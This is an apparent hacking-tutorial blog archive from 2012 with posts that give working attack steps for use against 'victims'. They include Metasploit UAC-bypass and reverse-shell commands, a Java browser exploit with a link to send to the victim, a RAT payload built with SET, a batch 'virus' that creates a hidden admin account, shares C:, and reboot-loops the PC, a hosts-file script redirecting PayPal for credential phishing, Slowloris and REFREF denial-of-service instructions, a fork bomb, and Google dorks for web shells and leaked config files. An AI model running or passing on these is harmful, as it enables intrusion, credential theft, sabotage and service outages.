Friday, December 28, 2012

D.N.S. poisoning using metasploit.

0 comments
Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.

(1)Hack remote p.c .(How to hack Remote P.C.?)

(2)Now we will Bypass U.A.C. protection of windows.

(3)Open Terminal & type following code in terminal

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit host file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will Redirect google.com in victim p.c to your desired I.P.

Monday, December 24, 2012

How to use R.A.T. through S.E.T?

1 comments
RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).

(1)Open your terminal & type

cd /opt/set

./set

(2)update your set

(3)Now select option 3 which is Third party Modules

(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).

(5)Enter I.P. Address of your computer to connect back

(6)Port RATTE Server should listen on [8080]: press enter

(7)Should RATTE be persistent [no|yes]?:yes

(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

(10)Now send your ratteM.exe files to victim, as soon as they download and open it

Start the ratteserver listener now [yes|no]:yes

(11)chose 1 option which is list client

(12)if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here

Now choose option2 “activate client”

Now you get menu with lots of menu. Select 1st option which is start shell.

Saturday, December 22, 2012

How to install & configure send mail in Ubuntu?

10 comments
Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic sending through machine.

How to Install Send-Mail?


Open terminal & type following command in terminal.

sudo apt-get install mailutils

sudo apt-get install sendmail


How to configure it?


After installing sendmail , you should configure sendmail. It`s little hard. But don`t worry after that we can spoof email to anyone.

Type following command on terminal

sudo gedit /etc/mail/sendmail.mc

It will open sendmail.mc file.

For example your last two lines are as follow

MAILER(`local')dnl

MAILER(`smtp')dnl

Put this code before that two lines.

MAILER_DEFINITIONS

define('SMART_HOST',`smtp.gmail.com')

Ok. now close that file

Now we will generate configure file from .mc file so type following command in terminal.

sudo bash -c 'cd/etc/mail/ && m4 sendmail.mc >sendmai.cf'

Now everything is complete, try to send mail using terminal or use Social Engineering Tool-Kit as i mention in previous post.


How to send mail through Command?


open terminal and type following command.

telnet 127.0.0.1 25

HELO server

MAIL from:sender`s email address

RCPT to: Recipient address

DATA

Subject:Test mail

from: sender`s email address

to: receiver`s address

Test Mail

.

quit


Now check spam folder of receiver`s email , you got email . Now check show original option of email , you can see that i.p. of computer , o.s. , many other things.

Thursday, December 20, 2012

How to install social engineering toolkit(S.E.T.) in ubuntu?

9 comments
Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it .

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

Extra package which is necessary to use SET effectively are as follow.

(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.

(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.

To install Ettercap open terminal in type following command:-

sudo apt-get install ettercap

(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal

sudo apt-get install openjdk-6-jdk


Now open terminal & change directory to opt.

sudo bash

cd /opt

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

cd /opt/set

svn update

nano config/set_config

Now we will configure it. First it require metaspolit path . So we will put it on configure file. Here comes problem , in first step we install metasploit , it`s directory is opt/metasploit-4.4.0/msf3. But when we put this path in configure file it cannot detect metasploit . So we have to rename metasploit-4.4.0 to framework3. So rename metasploit-4.4.0 folder name to framework3.

Put opt/framework3/msf3 this path in config file. Save it.Type in terminal.

./set

It will open SET .

In next tutorial I will show you how to configure sendmail & use it in set.

I Know I cannot explain good, So if you face any problem please mention in comment.

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

Monday, December 17, 2012

Download Free E-books about Hacking

792 comments

Hello guys, if you want to learn more about Hacking & Computer Security ,i uploaded below eBooks on dropbox.Download link is in end.

List of Books are as follow.

(1)CEH(Certified Ethical Hackers)2010V6.

(2)Hacking Wireless Networks For Dummies.

(3)H gray hat hacking.

(4)Blind_SQLInjection.

(5)backtrack-4-assuring-security-by-penetration-testing.

(6)Collections of Ankit Fadia Hacking Book.

(7)Secrets of Reverse Engineering.

(8)Social Engineering toolkit

(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.

New books Added

(10)CSRF attack & Defense

(11)Armitage guide

(12)Pass-the-hash attacks: Tools and Mitigation

(13)HACKING: THE ART OF EXPLOITATION


(14)XSS Attacks - Exploits and Defense


(15)Seven Deadliest Network Attack 


Download link:- Please click here.

Sunday, December 16, 2012

How to use REFREF?

0 comments
As we know in past , famous Hacktivist group Anonymous carried out series Of DDOS attack in number of websites like paypal ,master-card ,visa. At that time they used tool LOIC for down the website.

Although they got success in their project ,but due to LOIC some of hackers arrested later. So they decide to build new weapon for DOS attack.

It was REFREF. It is programmed in perl ,java ,python.But main requirement is URL must be vulnerable to SQL injection. It mean if you found website which is vulnerable to SQL injection , then by using this tool you can easily down website.

You can Download REFREF SCRIPT from here.

How to use?


It`s pretty simple. Just open terminal change path & Execute script.

cd Downloads

perl refref.pl vulnerable URL

It will down website in short time. This tools is very effective , 17 second attacks from single machine resulting down 42 min outage on pastebin.

Friday, December 14, 2012

Batch File Virus -4

0 comments
@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >

%SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All

Users\Start Menu\Programs\Startup\warnusr.vbs”

rem

***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha....! ” > %systemroot%\system32\1001\sd.bat

copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat

“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem

***************************************************************************

cd\

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd\

cd %systemroot%\system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code and paste it in a notepad, then save it with the .bat extension. This virus program will begin its operation at C:\windows\system32 and creates a new directory with name '1001', changes the time to 12:00 and date to 01-01-2000, then creates a new user with account name 'Microsoft_support' with a password 'support' matching the account.

It automatically assigns administrator rights to the user account that was created, then shares the root drive 'C:' which really is a security issue making the system completely vulnerable. It will create a VBScript file with name 'warnusr.vbs' that is used to display a message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or

Press No to Ignore the Virus', that really seems to be coming from the operating system itself, then it will change the keyboard setting by reducing the rate and delay time. Since the time and date has been already modified by the virus, it will automatically pop up a message stating 'You are requested to restart your Computer Now to prevent Damages or Data loss' exactly at 12:01 and 12:02, if the user restarts the computer, then it’s gone.

Whenever the user try to login to the computer, it will automatically reboots continuously, because the command 'shutdown -r' is set with time 00, and kept in start-up folder, the user has nothing to stop this unless he enters in safe mode and delete the file, more over the file is set with system and hidden attribute making it invisible.

The only way to stop this is to enter in safe mode and disable the start-up items, and then delete the file that reside in C:\windows\system32\1001 and in the start-up folder.

You can also use some exe-binders to bind this virus with any audio, video, text or whatever the files may be, then use some social engineering technique to make the victim execute the file by himself to harm his/her computer.

You can create this virus without using any third party tools in windows, also instead of exe-binder, you can use the ‘iexpress’ wizard to create a custom package.

Wednesday, December 12, 2012

Batch File Virus -3

0 comments
Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.

@echo off

:loop

Explorer

Call fork.bat

Goto loop

Copy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up.

Tuesday, December 11, 2012

Batch file virus -2

0 comments
Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.

Folder Replicator Virus:

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\

cd C:\Documents and Settings\username\Desktop

:loop

md Virus

cd Virus

goto loop

2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.

Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.

Monday, December 10, 2012

DNS poisoning using BATCH File

1 comments
Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.

DNS poisoning:


Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.

1. Just open up a notepad, copy and paste the below code

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

2. Save it as a batch file with the extension .bat

3. Then run it on the Victims computer to infect it.

4.This program creates a new entry in the hosts file, so that whenever an user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.

Saturday, December 8, 2012

How to scan web-server with Nikto?

0 comments
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Nikto is a tool that it has been written in Perl and it can perform tests against web servers in order to identify potential vulnerabilities

 Download Nikto from here.

 Open terminal & extract it in folder

 Then change directory, type following code in terminal

    cd Downloads/nikto-2.1.5

 Make nikto.pl file exectuable(right click on file, & make it executable)

 Update it by typing following command

    ./nikto.pl -update

 Now final step to scan webhost type following in termina

   ./nikto.pl -host I.p

Tuesday, December 4, 2012

how to Browser Autopwn attack in metasploit?

0 comments

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.
In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module.

metasploit-autopwn

Monday, December 3, 2012

How to crack wi-fi password in ubuntu?

17 comments

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s
(1)install aircrack
sudo apt-get install aircrack-ng

(2) You need to go in root first. For this purpose type “sudo su -“ and type your password.

(3)now type following command in terminal
Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
Code:
# airodump-ng wlan0 
crack-wi-fi-password-in-ubuntu

How to exploit VSFTPD ?

0 comments

VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.

VSFTPD is an FTP server that it can be found in unix operating systems like Ubuntu, CentOS, Fedora and Slackware. By default this service is secure however a major incident happened in July 2011 when someone replaced the original version with a version that contained a backdoor. The backdoor exists in the version 2.3.4 of VSFTPD and it can be exploited through metasploit.

So first we scan port 21 is it vsftpd 2.3.4 or not, for this purpose you can use nmap.
So let’s assume that we have scanned a host and we have discovered the version 2.3.4 of VSFTPD running on the system.
We can open the metasploit framework in order to search for the vsftpd module.
vsftpd-exploit

As we can see there is only one module that we can use. So we will start the configuring the module appropriately. In the next screenshot you can see the configurations that we need to do in this exploit in order to be executed successfully.
vsftpd-exploit

Wednesday, November 28, 2012

How to Hack targeted website(Basic)?

0 comments

Today is the age of computer and internet. More and more people are creating their own websites to market their products and earn more profit from it. Having your own website will definitely help you in getting more customer purchasing your products but at the same time you can also also attract hackers to play around with your site. If you have not taken enough care to protect your site from hackers then your business can even come to an end because of these hackers.

Before you hack into a system, you must decide what your goals are. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is that you have to decide what the goal is first.

The most common goals are:

1. Breaking into the system & taking the admin privileges.

2. Gaining sensitive data, such as credit cards, identification theft, etc. - not recommended

You should have all of your tools ready before you start the next steps too hacking. There is a Linux version called Backtrack. It is an operating system that comes with various security tools that will help you break into systems.

You must decide how you are going to achieve your task. Plan. There is a common methodology followed by hackers, I will mention it below. However, you can create your own methodology if you know what you are doing.

Common steps to be taken for hacking a system:

1. Reconnaissance (footprinting)

2. Scanning

3. Ports & Services Enumeration

4. Vulnerability Assessment

5. Vulnerability Exploitation

6. Penetration and Access

7. Privilege Escalation & owning the box

8. Erase tracks

9. Maintaining access

Monday, November 26, 2012

How to exploit robots.txt?

2 comments

What is robots.txt?


Robots.txt is a file that contain path which cannot crawled by bot most of time search-engine bots like google bot or etc. It tells search-engine that this directory is private & can not be crawled by them.

If yo are site owner & want to make robots.txt file , then go following link , it will create robots.txt file for you.

http://www.mcanerin.com/EN/search-engine/robots-txt.asp

so just for now , robots.txt is pretty much what websites use to block certain pages from search engines.

Here is a sample : http://www.whitehouse.gov/robots.txt

First method


Now this method is very rare & the web-master would have to be stupid to do this, but you'll be surprised how many stupid people there are in the world.

This one is simple, go to one of the disallowed directories & look in the source. Sometimes web-master leave comments there to give hints like passwords/ or user-names.

You never know you might find something juicy. :]

With this info you could possibly guess his password by entering some of the most infamous/best football teams.

You can also check for disallowed directory which may be allowed or weak permission.Click here for python script to audit robots.txt file automatically.

Exploit-robots.txt

Second method


Directory Traversal

Ok, you use directory traversal when you get denied from a web-page. For example if you go to a disallowed directory & you get denied [404 page]

You can easily bypass that if there insecure with directory traversal. Also, getting denied from a page shows that there must be some sexy info inside of it. :]

So lets get started.

1. Go to the directory you got denied from. I will be using an example.

www.slave.com/users/

2. Once you get denied you need to add a not found directory.

www.slave.com/users/randomwords&numbers

3. Now for the directory traversal part you need to add a /../

This will bring it back one directory, which can get you access to the disallowed directory.

www.slave.com/users/randomwords&numbers/../

Keep it mind that you can also use the first method if you get access to the directory.

Click here for more path traversal details tutorials.

Third method


CGI-BIN exploits

Alright, the /cgi-bin/ page has alot of public exploits out right now. So, this method only goes for if the site has /cgi-bin/

So, anyways. I dont want my tutorial to be to big so here is a list of CGI-BIN exploits.

https://www.hellboundhackers.org/articles/7-complete-set-of-cgi-bin-exploits-and-what-they-do.html

Sunday, November 25, 2012

How to POISONING ARP on network?

0 comments
How to do Address Resolution Protocol (ARP) poisoning?

What Does ARP Mean?


Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communication

between local nodes can be made.

On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program is present. This program can be used to display and/or modify ARP cache entries.

An example of the "arp" utility's output would look like the following:

Windows:

> arp -a

Interface: 192.168.1.100 .- 0x10003

Internet Address Physical Address Type

192.168.1.1 00-13-10-23-9a-53 dynamic

Linux:

$ arp -na

? (192.168.1.1) at 00:90:B1C:F8:C0 [ether] on eth0

FreeBSD:

$ arp -na

? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0

How ARP works?


Specifically for Internet Protocol Version 4 (IPv4), ARP maps IP addresses between the Network layer and Data Link layer of the Open System Interconnection (OSI) model.

For a more complete and thorough explanation of how address resolution works, and protocol specifics, please consult RFC 826.

ARP Protocol Flaws :-

ARP's main flaw is in its cache. Knowing that it is possible for ARP to update existing entries as well as add to the cache, this leads one to believe that forged replies can be made, which result in ARP cache poisoning attacks.

Terms & Definitions :-


ARP Cache Poisoning : Broadcasting forged ARP replies on a local network. In a sense, "fooling" nodes on the network. This can be done because ARP lacks authentication features, thus blindly accepting any request and reply that is received or sent.

MAC Address Flooding : An ARP cache poisoning attack that is mainly used in switched environments. By flooding a switch with fake MAC addresses, a switch is overloaded. Because of this, it broadcasts all network traffic to every connected node. This outcome is referred to as "broadcast mode" because, all traffic passing through the switch is broadcasted out like a Hub would do. This then can result in sniffing all network traffic.

The ARP Attacks :-


1] Connection Hijacking & Interception : Packet or connection hijacking and interception is the act in which any connected client can be victimized into getting their connection manipulated in a way that it is possible to take complete control over.

2] Connection Resetting : The name explains itself very well. When we are resetting a client's connection, we are cutting their connection to the system. This can be easily done using specially crafted code to do so. Luckily, we have wonderful software that was made to aid us in doing so.

3] Man In The Middle : One of the more prominent ways of attacking another user in order to hijack their traffic, is by means of a Man In The Middle (MITM) attack. Unlike the other attacks, a MITM is more a packet manipulation attack which in the end however does result in packet redirection to the attacker . all traffic will get sent to the attacker doing the MITM attack. This attack however is specific. As opposed to MAC Address Flooding or other attacks against a router/switch, the MITM attack is against a victim, and also can be done outside of a switched environment. Thus meaning, an attack can be executed against a person on the other side of the country.

4] Packet Sniffing : Sniffing on a Local Area Network (LAN) is quite easy if the network is segmented via a hub, rather than a switch. It is of course possible to sniff on a switched environment by performing a MAC flood attack. As a result of the MAC flood, the switch will act as a hub, and allow the entire network to be sniffed. This gives you a chance to use any sort of sniffing software available to you to use against the network, and gather packets.

5] Denial of Service : MAC Address Flooding can be considered a Denial of service attack. The main idea of the MAC flood, is to generate enough packet data to send toward a switch, attempting to make it panic. This will cause the switch to drop into broadcast mode and broadcast all packet data. This however did not result in a crash, or the service to be dropped, but to be overloaded.

Friday, November 23, 2012

How to use latest java vulnerability to hack remote p.c. ?

0 comments
Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.

(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal

(2)Now after update type msfconsole

(3)type use exploit/multi/browser/java_jre17_jaxws

(4)set payload java/shell_reverse_tcp

(5)set lhost 223.232.185.97(your I.p)

(6)set srvhost 223.232.185.97(server I.p.)

(7)set uripath /

(8)exploit

Now an URL you should give to your victim http://223.232.185.97:8080/

Now send link to victim. When victim open your link, you have access of victim` s computer.

(9)type sessions -l

(10)the Session number to connect to the session. And Now Type sessions -i ID

Wednesday, November 21, 2012

How to crack any hash with help of online services?

0 comments
How to crack any hash with help of online services?

findmyhash.py try to crack different types of hashes using free online services.

(1)Download it from here .

(2)Open terminal & change directory where you download tool , if we download tool in download folder then type in following command in terminal

cd Downloads

(3)python findmyhash.py


Accepted algorithms are:

MD4, MD5, SHA1, SHA256, RMD160, LM, NTLM, MYSQL, CISCO7 & JUNIPER

NOTE: for LM / NTLM it is recommended to introduce both values with this format:

python findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

python findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7


Valid OPTIONS are:

-h <hash_value> If you only want to crack one hash, specify its value with this option.

-f <file> If you have several hashes, you can specify a file with one hash per line.

NOTE: All of them have to be the same type.

-g If your hash cannot be cracked, search it in Google and show all the results.

NOTE: This option ONLY works with -h (one hash input) option.


Examples:

-> Try to crack only one hash.

python findmyhash.py MD5 -h 098f6bcd4621d373cade4e832627b4f6

-> If the hash cannot be cracked, it will be searched in Google.

python findmyhash.py SHA1 -h A94A8FE5CCB19BA61C4C0873D391E987982FBBD3 -g

-> Try to crack multiple hashes using a file (one hash per line).

python findmyhash.py MYSQL -f mysqlhashesfile.txt

Saturday, November 17, 2012

how to crack md5 hash in ubuntu?

0 comments

If you have an password in md5 hash and you need password in plain text for this there is lot of tool and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like here.

We are using a perl script to crack an hash so we had encrypted an text "r2/." into a md5 hash which is "5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt it again with perl in a plain text.

So first of all here we already know the length of text is 4 and it is included with specail characters like ". /" etc so our job will be easy but if we dont know the length and what kind of character included in hash then what? no problem we have some solution for that too ok lets began with first step if u are using linux here we are using back track for this first of all you need perl script so donalod and follow the steps to crack a hash i will try to explain each part of this script

(1)Download perl script from here.

(2)Make it exexcutable.

(3)open terminal & change directory where you download script.

(4)now type following command in terminal

perl md5crack.pl

you can see information about script.
 

(5)type following in terminal & hit enter.

perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72

our command will be like this > perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72

ad is charset if we will use ad option that means it will try only lowercase alphabets and all digits 0-9 now 1 is minimum lenth of hash character like a b c etc and 3 is maximum lenth of hash so this command will try all lowercase alpha numerical from 1 to 3 lenth so if password is like abc or ab9 tc it will show us result now lets see next command line

 
crack-md5-hash-in-ubuntu


(6)type following in terminal & hit enter.

perl md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72

see here aA charset if we will use this option than it will try

lower,uppercase alpha numerical word like "Jt3" and minimum length 3 and maximum is 3 it means it will try like this aaa,aab,aac ............aAc etc now lets move on last command line

(7)Type following command in terminal.

perl md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72

here is charset is aAdx it will try lower,upperalpha numerical and specail charater ./*-+& etc. here minimum lenth is 1 and maximum is 10 to it will start from a to aaaaaaaaaa the first command will finish our tast fast but if hash included only lowercase alpha numerical word secound will try uppercase so it will took more than first command and thrid one will took more then first and second command so how to finish our job fast ok for cracking an hash i will say use more shell in one time like see normaly an pass length will be minimum 4 digits so we can start from 4 and maximum may be 10 or more so here what to do we can use 6 shell in one time for first command i will give u example here.

(8)it`s our last example.

perl md5crack.pl 4 4 900150983cd24fb0d6963f7d28e17f72

perl md5crack.pl ad 4 4 <hash here> this command will try only 4 charcter lenght word so in second shell we can try 5 5 so that will try only 5 charcter lengh word

perl md5crack.pl ad 5 5 <hash here> like this we can use 6 6, 7 7, 8 8 , etc so minimum and maximum length will be same so task will be finish fast and it depend on charset what kind of charset you are trying like ad,aA or aAdx now as i told here i have an example to make understand>>> text= "r2/." and encrypted md5 hash is "5d28a1f53e24a8b0a85d0a53348d49ad" we will try to crack it again in plain text here we will try command line > perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad 

How to install & use SLOWLORIS in ubuntu?

1 comments
(1)Open a browser and go to this URL: ‘http://ha.ckers.org/slowloris‘ (here you can know more about what is SLOWLORIS, & what it can do)

(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.

(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.

(4)Then type in your terminal:

sudo apt-get install perl-doc

and enter your password when prompted. This installs the Perl documentation module you’ll need to see the Slowloris help page. Wait while the packages download and install.

(5)Then type this command, (all in one line) and press enter:

sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl

(6)When ask yes/no type Y and press enter, this installs some libraries for Slowloris.

Again type another command, this time:

perldoc slowloris.pl

and hit enter. This will show the documentation for Slowloris. I usually type Crtl+X+Y=enter to save it as a record but if you like you can just scan it and type Crtl+X to get rid of it.

(7)Next you should type

sudo perl slowloris.pl -dns example.com -port 80 -test

hit enter and password if requested. This tests the server to see what it’s timeout window is. Wait until the test finishes, it will take several minutes. When it’s done it will tell you what timeout value to use….something along the likes of ‘Use 240 seconds for -timeout’.

(8)In the terminal window type,

sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5

This performs the actual attack, if your time out test told you to use another timeout value use that.

(9)In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users.

To stop the attack just type Ctrl+C.

Some cool Google Dork

1 comments
Symlink dork.

Code:

inurl:/sym/root/ & intext:"Parent Directory"

c99shell dork.

Code:

inurl:(shell.php | c99.php) Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

c99shell dork(2).

Code:

inurl:(shell.php | c99.php) intitle:c99shell Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

WordPress MySQL details.

Code:

inurl:(wp-config.conf | wp-config.txt) ext:(conf | txt | config)

Databases username && passwords.

Code:

inurl:/includes/ & ext:inc & inurl:connect | inurl:dbconnect & -site:phpkode.com

Phish The Phisher

Code:

filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="

phpmyadmin exploit

Code:

allinurl:index.php?db=information_schema

Here is list of other google dork. Download here.

Friday, November 16, 2012

How to find person through his email-address?

3 comments

How to find person through its email-address?
If you get email from unknown person and before giving reply to email, you want to find little information about that person , then you need reverse email-address lookup. Or someone who abuse you , & you want to trace person you should use reverse email-address lookup.
If person has website or listed his account in any public website then you can find information about use of search engine. But in most cases , person use fake email-address for communication.

(1)If person use any desktop client(like outlook,Evolution mail etc) to send email then you can trace his I.P. From email. But if he send from browser then you get location of his email provider. For example , person send email from gmail through web-browser then you get location of gmail server.

Open the header of the email message and look for lines that say “Received: from” followed by an IP address in square brackets. If there are multiple entries, use the IP address mentioned in the last entry.
Now paste the IP address in this trace route tool and you should get a fairly good idea about the location of the email sender.

Saturday, November 10, 2012

HOW TO DO SQL INJECTION FROM LINUX?

3 comments
Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it also works in windows.SQLMAP is far more advanced than HAVIJ.

How To Use SqlMap?


(1)Download SQLMAP here.

(2)Now extract it wherever you want.

(3)Change directory & I mean if you extract to download then, open terminal & type following code

cd Downloads

cd sqlmapproject-sqlmap-f305dde

(4)Now if you want to find url is vulnerable to sql injection or not. Type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”

sql-injection-test

(5)To get database of website. Type following command in terminal

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dbs

sqlmap-dbs

(6)To get tables & columns of database , type following command

